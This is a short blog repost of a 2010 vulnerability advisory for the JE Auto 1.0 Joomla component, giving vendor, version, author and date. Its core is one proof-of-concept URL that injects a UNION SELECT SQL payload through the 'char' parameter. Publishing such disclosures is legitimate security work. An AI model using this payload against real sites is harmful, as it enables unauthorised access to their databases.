Joomla JE Auto Component 1.0 SQL Injection Vulnerability ~ Zer0-0ne

Thursday, December 9, 2010

Joomla JE Auto Component 1.0 SQL Injection Vulnerability

JE Auto 1.0 SQL Injection Vulnerability

Name JE Auto
Vendor http://joomlaextensions.co.in/extensions/components/je-auto.html
Versions Affected 1.0

Author Salvatore Fresta aka Drosophila
Website http://www.salvatorefresta.net
Contact salvatorefresta [at] gmail [dot] com
Date 2010-12-09

JE Auto is a commercial Joomla's component.
SQL Injection

http://site/path/index.php?option=com_jeauto&catid=1&item=1&Itemid=3&view=item&char=' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14%23

Zer0-0ne

Thursday, December 9, 2010

Joomla JE Auto Component 1.0 SQL Injection Vulnerability

0 comments:

Post a Comment

About Me

Blog Archive

Popular Posts

Categories

Featured Posts